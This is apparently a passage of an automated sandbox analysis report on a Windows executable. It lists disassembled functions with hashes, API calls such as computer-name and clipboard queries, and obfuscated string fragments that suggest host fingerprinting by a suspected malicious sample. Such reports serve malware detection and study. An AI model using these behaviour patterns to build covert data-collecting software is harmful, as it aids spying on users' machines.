                                                        • Opcode ID: ef8483e8ab778255dd258931c3d82cf31cc5b03f09e4434ba3215fbb1080e3d0
                                                        • Instruction ID: 95046018421402d0801aebd9565f509305716e141edef8233f74c498256fed45
                                                        • Opcode Fuzzy Hash: ef8483e8ab778255dd258931c3d82cf31cc5b03f09e4434ba3215fbb1080e3d0
                                                        • Instruction Fuzzy Hash: 8F811A20108FC2CED332867C8948747BFD15B27228F484B9DD5E64BBD2D2AAB509C766
                                                        APIs
                                                        • GetComputerNameExA.KERNELBASE(00000005,D3BAB492,00000100), ref: 0042F301
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID: ComputerName
                                                        • String ID:
                                                        • API String ID: 3545744682-0
                                                        • Opcode ID: 5f99d4ff4f8377a95cea722d27edd5ab8b31f14781de5b973d5a456a3fa85f19
                                                        • Instruction ID: 2bea6ffdc9a5f01b0fb38135ff7c329ec52023607b2de6582bc56e9ec8f1d5ec
                                                        • Opcode Fuzzy Hash: 5f99d4ff4f8377a95cea722d27edd5ab8b31f14781de5b973d5a456a3fa85f19
                                                        • Instruction Fuzzy Hash: 5A218E3460D3D28BD774CF25D4987EBB7E0AB86304F54896DC4D987281CA75580ACB96
                                                        APIs
                                                        • GetUserDefaultUILanguage.KERNELBASE ref: 0043B996
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID: DefaultLanguageUser
                                                        • String ID:
                                                        • API String ID: 95929093-0
                                                        • Opcode ID: 98e9cfe35c1bf7e059ea3f603ca1750e6c53937badd962860f9777bb0233e5b3
                                                        • Instruction ID: 791500818c7a1469a8ddc9d1224b017d77911d2958c513979461ec400309f230
                                                        • Opcode Fuzzy Hash: 98e9cfe35c1bf7e059ea3f603ca1750e6c53937badd962860f9777bb0233e5b3
                                                        • Instruction Fuzzy Hash: 4B219F71A046418FD714CF38C994B99BBF1AB5A310F0982D9D1A5DB3E2D7388D408F51
                                                        APIs
                                                        • RtlReAllocateHeap.NTDLL(?,00000000,?,00000000,?,?,0040BC80,00000000,00000000), ref: 00442052
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1279760036-0
                                                        • Opcode ID: ea8428d80ce760913c6091ce044fd24d24df86904107ae5a33981043699a0a50
                                                        • Instruction ID: ce4dc6f8cea40f70218e043c946db7baefed7d7f927e290f9bf4e18e7a102a01
                                                        • Opcode Fuzzy Hash: ea8428d80ce760913c6091ce044fd24d24df86904107ae5a33981043699a0a50
                                                        • Instruction Fuzzy Hash: 95E02B72514210ABF2101F387C05B1736749FC2715F054436F601A3111D739E811C19E
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID: BlanketProxy
                                                        • String ID:
                                                        • API String ID: 3890896728-0
                                                        • Opcode ID: 1eee05ed824ab0fad7e0fec43f832c4afae3966b95aa27efb02f9f36988d2f71
                                                        • Instruction ID: 81660e69c17f0543e92a0099c1eb05d4904c421e706bb06363d2a5bfa495106c
                                                        • Opcode Fuzzy Hash: 1eee05ed824ab0fad7e0fec43f832c4afae3966b95aa27efb02f9f36988d2f71
                                                        • Instruction Fuzzy Hash: B9F0B7742497028FD355DF68C5A471BBBE0EF49304F01882CE5A68B290CBB5A948CF82
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID: BlanketProxy
                                                        • String ID:
                                                        • API String ID: 3890896728-0
                                                        • Opcode ID: 53b3cb3652385e22ea377a8ab379108a4fc6dc91706275fd2e50ee136dcc3ceb
                                                        • Instruction ID: d7c258c8275f3fac7a4ea29dfb35da0c5007ac1f08ebe8bc9e26289c7763600b
                                                        • Opcode Fuzzy Hash: 53b3cb3652385e22ea377a8ab379108a4fc6dc91706275fd2e50ee136dcc3ceb
                                                        • Instruction Fuzzy Hash: C5F0A5B02087028FE310DF25C5A974FBBE5BB81348F11890DE5A54B291C7FA96898FC6
                                                        APIs
                                                        • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040D413
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID: Initialize
                                                        • String ID:
                                                        • API String ID: 2538663250-0
                                                        • Opcode ID: b103da860b07b6caeef7231849386c8b9813f2fcc2fc8537c1924e67a92246bd
                                                        • Instruction ID: 5b8c1c1c38bc235c753b9088e917c06d101502a7d4806eff28edba5b46e46085
                                                        • Opcode Fuzzy Hash: b103da860b07b6caeef7231849386c8b9813f2fcc2fc8537c1924e67a92246bd
                                                        • Instruction Fuzzy Hash: 32D05E7565014477D2146B18EC47F563658970375AF000229F663C65D1D910A915E569
                                                        APIs
                                                        • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040D445
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID: InitializeSecurity
                                                        • String ID:
                                                        • API String ID: 640775948-0
                                                        • Opcode ID: 08574d9084c9b59a9be89533cd06f00eba31ac9089c6781083e346e8ebf9aaa5
                                                        • Instruction ID: f87055a7ed73e73a39e7b0bf2bc1a884afc0d8708234b3b1202e7b1dbc502a37
                                                        • Opcode Fuzzy Hash: 08574d9084c9b59a9be89533cd06f00eba31ac9089c6781083e346e8ebf9aaa5
                                                        • Instruction Fuzzy Hash: 52D0C9787D8305B7F6685B18EC17F1632505306F61F340229B366FF6D0C9D07901961C
                                                        APIs
                                                        • RtlFreeHeap.NTDLL(?,00000000), ref: 004404FD
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID: FreeHeap
                                                        • String ID:
                                                        • API String ID: 3298025750-0
                                                        • Opcode ID: ffaa9ae7a0f019c742f1804f8799764577334675712f88277fcdd572fe457cd5
                                                        • Instruction ID: e6622cb3e0fd9e941ff1a23b217b6006838c210e8ccdd082eec4ddb73310e109
                                                        • Opcode Fuzzy Hash: ffaa9ae7a0f019c742f1804f8799764577334675712f88277fcdd572fe457cd5
                                                        • Instruction Fuzzy Hash: 4AC08C31504922EBC7102F28BC16BC63A14EF02762F0748B1F000A90B5C728EC91C9D8
                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(?,00000000,?,00000001,00408C27,FDFCE302), ref: 004404C0
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1279760036-0
                                                        • Opcode ID: 1b7010b4c8090af6c82bcce16cf64795d3be7dfa4a7c6d6e8218ea40ee4cb554
                                                        • Instruction ID: a3e7d273c8645b615fb13e0d68042f64d6ea605513032f2b713a79b74872f641
                                                        • Opcode Fuzzy Hash: 1b7010b4c8090af6c82bcce16cf64795d3be7dfa4a7c6d6e8218ea40ee4cb554
                                                        • Instruction Fuzzy Hash: CFC04871045220ABDA502B25EC09BCA3A68AF46662F0280A6B044A70B2C760AC82CA98
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $ ]ZN$ ]ZN$ ]ZN$!$!$"$"$$$$$$$%$&$'$'$($($*$+$+$,$-$.$.$0$0$1$1$2$3$4$4$6$6$6$8$8$9$:$:$<$=$>$@$@$A$B$B$D$D$D$D$E$F$H$J$J$L$L$L$M$N$N$N$P$Q$R$R$S$T$T$V$W$X$Z$\$^$`$a$b$d$e$f$f$m$p$p$q$q$r$t$v$v$w$w$x$y$z$z$|$~
                                                        • API String ID: 0-299570860
                                                        • Opcode ID: f5b952a7fa576cf3fac9bc8395e035e8ba89dd158049201593eea142aec36e13
                                                        • Instruction ID: 11c8b48c8f4a98f758d37e8cd5808665052ec381988852a9cf89f45dba9536ca
                                                        • Opcode Fuzzy Hash: f5b952a7fa576cf3fac9bc8395e035e8ba89dd158049201593eea142aec36e13
                                                        • Instruction Fuzzy Hash: CF03B07010C7C08AD3259B38C5883EFBFD1AB96314F188A6EE5E9873D2D7798585871B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: !$&$'$($($*$.$/$4$4$6$7$9$:$<$>$?$?$?$?$B$C$C$D$D$E$F$F$G$G$H$I$J$L$L$L$L$L$N$P$Q$R$S$S$S$T$U$V$X$Z$Z$[$[$\$]$`$b$c$c$c$d$d$e$g$g$g$h$h$i$i$k$k$k$l$o$p$p$q$q$s$t$t$u$u$u$v$w$x$y$z${${${$|$|$}$~$~
                                                        • API String ID: 0-1873956536
                                                        • Opcode ID: fc18553a73c8fd4dc2fea3a9f9035c4283c881730360b760b769bf46582e99ae
                                                        • Instruction ID: 931559f782a0dae5da6d3a2348cda9da3af0ea84656c223040a8e2c7efec153d
                                                        • Opcode Fuzzy Hash: fc18553a73c8fd4dc2fea3a9f9035c4283c881730360b760b769bf46582e99ae
                                                        • Instruction Fuzzy Hash: DAB28F3160C7C08BD325DA38C85439FBBD1ABD6324F184A6DE8E98B3C2D6799849C757
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: F;D$zx$'Y<[$(]2_$2U/W$2{<u$3416$3416$6fd$7J0H$7w$:vt$N>_<$SP$Ta\c$Teg$Vt%t$Z[$bxB$qVol$s@qF$wDuJ${HyN$jh$nl$zx
                                                        • API String ID: 0-2025997952
                                                        • Opcode ID: d34ec39eb96bb7efa42d43d0cecc10ce8a4047bc9737a28ca6cdc305126fa738
                                                        • Instruction ID: 8ebcec6048e81b7414bf2c44ea1e9f7dace67e943cef4cf10300ed7be7304af5
                                                        • Opcode Fuzzy Hash: d34ec39eb96bb7efa42d43d0cecc10ce8a4047bc9737a28ca6cdc305126fa738
                                                        • Instruction Fuzzy Hash: D1B273B160C3918BD334CF14D8417ABBBF2FB95304F44892DD4C99B252D7798A4ADB8A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: pA$)$*$7$>gVf$TW$WH$X2c0$ruA$}&'$
                                                        • API String ID: 0-2465278142
                                                        • Opcode ID: 066c8ce5b71a5b696cd3803d73cf449c38db815dbdda3cc7b9b4004b6f854aec
                                                        • Instruction ID: db295268db8bdf45a891635b6dee4b286def9570c954afad4e7b9bb962e3f9ad
                                                        • Opcode Fuzzy Hash: 066c8ce5b71a5b696cd3803d73cf449c38db815dbdda3cc7b9b4004b6f854aec
                                                        • Instruction Fuzzy Hash: 947211756483528BD324CF28C8917ABBBF1FF95314F18896DE4C58B3A1E7388945CB86
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 6$6y$EnA$YjM$YjM$fjM$fjM$pSlM$yx$y~${
                                                        • API String ID: 0-2342033412
                                                        • Opcode ID: bcc76d1abf98286d77b35e6a0b09e71a8baff3536dadb212a893043a5b643fc1
                                                        • Instruction ID: a2001c8a8adb2b8dbf3dd01cda6d968c98786edfc2a21b29c8f54ffb17cc71b7
                                                        • Opcode Fuzzy Hash: bcc76d1abf98286d77b35e6a0b09e71a8baff3536dadb212a893043a5b643fc1
                                                        • Instruction Fuzzy Hash: 9762E3741083418FE724CF25C891BAB77E1FF86314F15496DE0D69B2A2D738D84ACB9A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $$&$5$A$J$t
                                                        • API String ID: 0-1619763526
                                                        • Opcode ID: 2bdb521bc7c73c0b7c7245bb86837fa704f627e98ff44684887737040ddb6845
                                                        • Instruction ID: a53242e4cf12c94eabb5fc35352f39a952aaa25ff7b8dface19663bb3d57fcdd
                                                        • Opcode Fuzzy Hash: 2bdb521bc7c73c0b7c7245bb86837fa704f627e98ff44684887737040ddb6845
                                                        • Instruction Fuzzy Hash: FB22B07160C7808BC7249B38C5943AFBBE1ABC5324F184A2EE9E9D73C1D77889458B47
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: A0CAAC5595236522822D1F4978021086$EVA^$UJVM$VW$W$]NGD$b$~9$yD
                                                        • API String ID: 0-452750746
                                                        • Opcode ID: 63948a1a35424d92484af45aa3e419c807616ca0303279be93579cff46dd4037
                                                        • Instruction ID: ffcda9fbc27d5fd1cec50cde84d534a082da3ff5d4e5b8e77816747385cb8e1d
                                                        • Opcode Fuzzy Hash: 63948a1a35424d92484af45aa3e419c807616ca0303279be93579cff46dd4037
                                                        • Instruction Fuzzy Hash: 82E1D1715083808BD724CF24C8947ABBBE2FFD5308F08892DE4D99B392DB798509CB56
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: )Ku$DM_e$S;G%$SV$UGEA$c[G$ox}k$x[G
                                                        • API String ID: 0-3323421312
                                                        • Opcode ID: 955f6e51a34149f4c10f413aa8795b1a1dd05340e96898ae9af78c9a06cf57c5
                                                        • Instruction ID: 7fd46061e40033794bbc6c3ce90a1e611a10dbdcf815d020572bc93dee4dedaf
                                                        • Opcode Fuzzy Hash: 955f6e51a34149f4c10f413aa8795b1a1dd05340e96898ae9af78c9a06cf57c5
                                                        • Instruction Fuzzy Hash: 55D1F57150C3408BD724CF29845476BFBE2EFD1708F18896DE4D56B385D77A890A8B8B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ADTD$E$ID$Y$eMOK$vu$vxtq$|xzy
                                                        • API String ID: 0-1466227541
                                                        • Opcode ID: 694bb15107f4bc877fab139e9b3cb1dd418c9edad3bc46051563358933346528
                                                        • Instruction ID: 68c016febbe7a0715404e25fe2d2c1f5bf377f828986e49a58439a2b7b357855
                                                        • Opcode Fuzzy Hash: 694bb15107f4bc877fab139e9b3cb1dd418c9edad3bc46051563358933346528
                                                        • Instruction Fuzzy Hash: 7871E23158C3928AD3118F7AC4A076BFFE09FA2350F1C496DE4D45B392D37989099B9A
                                                        APIs
                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 0042A8F7
                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,?), ref: 0042A9CF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID: EnvironmentExpandStrings
                                                        • String ID: *$*$q
                                                        • API String ID: 237503144-4001757600
                                                        • Opcode ID: 5f672a718d274909524f70c82779d112448254364d71578b31479b925a6e829e
                                                        • Instruction ID: 6a2a75fc59155a11c5aec0aea031f7e0da65668b1aff7312ce30b4a80edc4f4b
                                                        • Opcode Fuzzy Hash: 5f672a718d274909524f70c82779d112448254364d71578b31479b925a6e829e
                                                        • Instruction Fuzzy Hash: 130212B56083158FD724CF28D89135FB7E1FFC5308F05892DE9999B291DB78890ACB86
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $i|3$)--l$4?!;$6?34$9;#&$?+9&$K
                                                        • API String ID: 0-2829372548
                                                        • Opcode ID: 338e6b2548f6942e75dc87549e7f56e2f23b8a97b2fe11a06af31a37ceb72b1f
                                                        • Instruction ID: 6807048b151084a9e8e11973f3dfbc4b5eda1ab4f65a555cc9214e5bb2479a1e
                                                        • Opcode Fuzzy Hash: 338e6b2548f6942e75dc87549e7f56e2f23b8a97b2fe11a06af31a37ceb72b1f
                                                        • Instruction Fuzzy Hash: 2DD1247120C7818BD729CF29C45036BBFE1AB97314F0889AED0D5DB382DA3D8909C756
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID: Clipboard$Global$CloseDataLockOpenUnlock
                                                        • String ID:
                                                        • API String ID: 1006321803-0
                                                        • Opcode ID: 0d51a4dc2fe6236f60cf615c35f494bc4f8871562ce58d512750188790d88ec3
                                                        • Instruction ID: cc871ad810d5ebcc8503e7b8c4c024891cf7c86b0654bd3a3462fcbae073f9f9
                                                        • Opcode Fuzzy Hash: 0d51a4dc2fe6236f60cf615c35f494bc4f8871562ce58d512750188790d88ec3
                                                        • Instruction Fuzzy Hash: 0B41ABB010C7818FE310EF78944936FBFE0AB96308F09496EE4C586282D67C858DD7A7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: >$A$O$f$g$j$q
                                                        • API String ID: 0-654885204
                                                        • Opcode ID: 6e719cf540110b28232b330fd9c3123724b655a2ede16ab93559da8430dfb06e
                                                        • Instruction ID: 933c444832a5593444b97503960d5bfec1f1b34db4cd747dab4759e8adc9f3c2
                                                        • Opcode Fuzzy Hash: 6e719cf540110b28232b330fd9c3123724b655a2ede16ab93559da8430dfb06e
                                                        • Instruction Fuzzy Hash: DAD1F633A0C7D04AD324853C889535BAEC25BE6324F1D8B7EE9F5973C6D66D88068357
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Gt$J[$LUC_$we`k$x}{z$|A
                                                        • API String ID: 0-4062276182
                                                        • Opcode ID: a80706b1bcf71f0eeb055f17b4aa1439f32228796d62799fc01b238a482912c0
                                                        • Instruction ID: f20c1733954f3d7476a331e7578cdc678171662c1333d6829e8b94656b24469a
                                                        • Opcode Fuzzy Hash: a80706b1bcf71f0eeb055f17b4aa1439f32228796d62799fc01b238a482912c0
                                                        • Instruction Fuzzy Hash: 080200B5A08350CBD3209F25D84176BBBE2FFC6318F454A6DE5C85B390DB799805CB8A
                                                        APIs
                                                        • FreeLibrary.KERNEL32(?), ref: 00419FF7
                                                        • FreeLibrary.KERNEL32(?), ref: 0041A039
                                                          • Part of subcall function 00442080: LdrInitializeThunk.NTDLL(0044523A,?,00000018,?,?,00000018,?,?,?), ref: 004420AE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID: FreeLibrary$InitializeThunk
                                                        • String ID: mj
                                                        • API String ID: 764372645-1022201683
                                                        • Opcode ID: c086cc875a9495cf51c40eac8dc5e50a76db1f680bda795562031d64835a4f2b
                                                        • Instruction ID: e4b45be28fd4c7cbff433e2c06fe463db16693d42f5f124cafcdabba2620905a
                                                        • Opcode Fuzzy Hash: c086cc875a9495cf51c40eac8dc5e50a76db1f680bda795562031d64835a4f2b
                                                        • Instruction Fuzzy Hash: D76223746093009FE724CF25CC507ABBBE2BB85318F24861EE594573A1E7399C96CB4B
                                                        APIs
                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00425E98
                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 00425F24
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID: EnvironmentExpandStrings
                                                        • String ID: 23
                                                        • API String ID: 237503144-326707096
                                                        • Opcode ID: 68f62ab6bbdc17d543da7d6c80b4e2832be22e5d8e63cefdd40be9526a9cccd6
                                                        • Instruction ID: b6730ddf130f4e2a19c05504fd255247e3d11648143caf2c2a016be5e81be571
                                                        • Opcode Fuzzy Hash: 68f62ab6bbdc17d543da7d6c80b4e2832be22e5d8e63cefdd40be9526a9cccd6
                                                        • Instruction Fuzzy Hash: 7B7112B1A043189FEB20CFA8D841BEEBBB1FB45304F10843DE905AB2C5D775590ACB89
                                                        APIs
                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00429C9A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID: EnvironmentExpandStrings
                                                        • String ID: 67
                                                        • API String ID: 237503144-1886922373
                                                        • Opcode ID: efaa971be64e3f0e55855db326838b403e2c0136300b1c41449d082944818f00
                                                        • Instruction ID: a5821a17d697f7f316c5e23e8fd2eb7e472b5f5b3478a77b5a5598d7e69c89e3
                                                        • Opcode Fuzzy Hash: efaa971be64e3f0e55855db326838b403e2c0136300b1c41449d082944818f00
                                                        • Instruction Fuzzy Hash: 6D61F0B66083408BD724DF29E88175FB7E1EBC9304F18493DE58997281DB35D905CB8A
                                                        APIs
                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00429C9A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID: EnvironmentExpandStrings
                                                        • String ID: 67
                                                        • API String ID: 237503144-1886922373
                                                        • Opcode ID: 38b103ba2a0b24bd1f0b7068b570aa69e159151b381139e18933ad9306aeec92
                                                        • Instruction ID: 7ba92da05bbbaddbc1e3305b36c9b0db2ded0e94f959a81563e8173db3a816b3
                                                        • Opcode Fuzzy Hash: 38b103ba2a0b24bd1f0b7068b570aa69e159151b381139e18933ad9306aeec92
                                                        • Instruction Fuzzy Hash: A961FEB66083408FD724DF25D88176FBBE2EBC9304F19493DE5898B281DB75C805CB8A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: #C}$@-$up$vC
                                                        • API String ID: 0-3794437364
                                                        • Opcode ID: fe4f9d4565ffa40ec65875b6bd9e8bbb556a4c85dd3c3c1a3913f1bfe2a2c7a4
                                                        • Instruction ID: 145fb0a50be3e303ead08e2671ce65b3aa3df702a645c1f6ac8533401e1fa356
                                                        • Opcode Fuzzy Hash: fe4f9d4565ffa40ec65875b6bd9e8bbb556a4c85dd3c3c1a3913f1bfe2a2c7a4
                                                        • Instruction Fuzzy Hash: 9FE1EBB5209340DFE324DF25E88076FBBE1FB86304F54882EE5898B251DB35D945CB9A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 67$J$u$wq
                                                        • API String ID: 0-4028943437
                                                        • Opcode ID: 9816c7c8f30c88303995e0134799a24946b230c62976ec73ca8666db259d96e2
                                                        • Instruction ID: 45cabc22797d8237a69fda20461bdfe49cb428b8aed426b658ce7b40843b0e88
                                                        • Opcode Fuzzy Hash: 9816c7c8f30c88303995e0134799a24946b230c62976ec73ca8666db259d96e2
                                                        • Instruction Fuzzy Hash: 2AB176B04483828BD7348F25C4A17EBBBE1EF92314F14892DD8D94B785E7794886CB87
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: M;D$>D$UUK
                                                        • API String ID: 0-3649699930
                                                        • Opcode ID: 8ead049028bc91adeff9622f45da0367f919806cf8365be0a15fc24cee2962a3
                                                        • Instruction ID: fc75cb93acbb787b45c4a477a4821f2fed63727632898f6dbcded6a89fb42fc6
                                                        • Opcode Fuzzy Hash: 8ead049028bc91adeff9622f45da0367f919806cf8365be0a15fc24cee2962a3
                                                        • Instruction Fuzzy Hash: 8E22FE3AA08310CFD314DF29E89072BB7E2FB8A315F4A887DD58987361E674D941CB85
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: M;D$>D$UUK
